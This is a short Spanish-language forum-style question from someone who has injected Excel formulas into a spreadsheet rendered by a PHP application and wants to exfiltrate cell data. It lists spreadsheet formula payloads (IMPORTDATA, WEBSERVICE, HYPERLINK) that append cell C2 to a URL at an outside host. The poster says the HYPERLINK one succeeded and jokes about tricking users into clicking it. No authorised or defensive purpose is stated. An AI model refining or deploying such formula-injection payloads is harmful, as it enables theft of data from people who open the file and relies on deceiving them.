Necesito extraer datos de una carpeta de Excel usando las funciones de Excel 2007.
El concepto está relacionado de alguna manera con el tipo XSS de exfiltración de datos almacenado, solo que necesito usar las funciones de Excel 2007 (que logré inyectar en las celdas del archivo) para que el usuario cargue automáticamente una imagen, ruta web o marca una solicitud de DNS.
Hasta ahora he intentado lo siguiente, pero fallaron porque el archivo de Excel se representa en PHP con funciones de Excel 2007:
-
=IMPORTDATA(CONCATENATE("https://example.com/", C2))
-
=WEBSERVICE(CONCATENATE("https://example.com/", C2))
He inyectado con éxito:
-
=HYPERLINK(CONCATENATE("https://example.com/",C2), "HYPERLINK HIJACKING")
Pero de esta manera tengo que engañar a un usuario para que abra el enlace por sí mismo (no es imposible, pero no es divertido: D).